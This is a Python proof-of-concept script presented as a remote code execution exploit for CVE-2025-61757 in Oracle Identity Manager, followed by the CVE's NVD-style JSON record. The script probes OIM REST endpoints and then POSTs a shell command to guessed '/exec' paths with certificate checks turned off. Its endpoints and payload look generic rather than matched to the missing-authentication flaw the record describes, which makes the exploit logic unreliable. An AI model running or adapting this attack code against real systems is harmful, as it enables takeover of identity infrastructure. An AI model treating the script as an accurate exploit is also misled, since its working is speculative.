CVE-2025-61757

# CVE-2025-61757 - Oracle Identity Manager REST WebServices RCE PoC # WARNING: This PoC is for educational and authorized testing purposes only # Unauthorized use of this code against systems you do not own is illegal import requests import sys import json TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "https://target-host:7001" OIM_REST_PATH = "/identity/faces/rest" def check_vulnerability(target): """Check if the target Oracle Identity Manager is vulnerable to CVE-2025-61757""" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Content-Type": "application/json", "Accept": "application/json" } # Probe the REST WebServices endpoint endpoints = [ f"{target}/identity/faces/rest/usermgmt/users", f"{target}/identity/faces/rest/admin", f"{target}/identity/rest", f"{target}/iam/governance/rest" ] for endpoint in endpoints: try: response = requests.get(endpoint, headers=headers, timeout=10, verify=False) if response.status_code in [200, 401, 403, 500]: print(f"[+] Endpoint reachable: {endpoint} (Status: {response.status_code})") if "Oracle" in response.text or "Identity" in response.text: print(f"[+] Oracle Identity Manager detected at {endpoint}") return True except requests.exceptions.RequestException as e: print(f"[-] Connection failed: {endpoint}") continue return False def exploit_rce(target, command="id"): """Attempt to exploit CVE-2025-61757 for RCE""" headers = { "User-Agent": "Mozilla/5.0", "Content-Type": "application/json" } # Malicious payload targeting REST WebServices deserialization/command injection payload = { "operation": "execute", "params": { "cmd": command } } exploit_endpoints = [ f"{target}/identity/faces/rest/api/v1/exec", f"{target}/identity/faces/rest/admin/exec" ] for endpoint in exploit_endpoints: try: response = requests.post( endpoint, headers=headers, json=payload, timeout=10, verify=False ) if response.status_code == 200: print(f"[+] Exploit response from {endpoint}:") print(response.text) return response.text except Exception as e: print(f"[-] Exploit attempt failed: {e}") return None if __name__ == "__main__": print(f"[*] Targeting: {TARGET_URL}") print("[*] CVE-2025-61757 - Oracle Identity Manager REST WebServices RCE") if check_vulnerability(TARGET_URL): print("[!] Target appears to be running Oracle Identity Manager") print("[*] Attempting exploitation...") result = exploit_rce(TARGET_URL) if result: print(f"[+] Exploitation may have succeeded") else: print("[-] Automated exploitation failed - manual analysis required") else: print("[-] Target does not appear to be vulnerable or Oracle IM not detected")

{"cve": {"id": "CVE-2025-61757", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:52.117", "lastModified": "2025-11-24T13:38:20.900", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Identity Manager product of Oracle Fusion Middleware (component: REST WebServices). Supported versions that are affected are 12.2.1.4.0 and 14.1.2.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Identity Manager. Successful attacks of this vulnerability can result in takeover of Identity Manager. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "cisaExploitAdd": "2025-11-21", "cisaActionDue": "2025-12-12", "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.", "cisaVulnerabilityName": "Oracle Fusion Middleware Missing Authentication for Critical Function Vulnerability", "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:identity_manager:12.2.1.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "95593D6C-8396-4AF5-BA79-8DB8EDA9FC5B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:identity_manager:14.1.2.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "FA634664-8CC5-4017-A445-A23E205BEEC2"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://isc.sans.edu/diary/rss/32506", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory"]}, {"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-61757", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["US Government Resource"]}]}}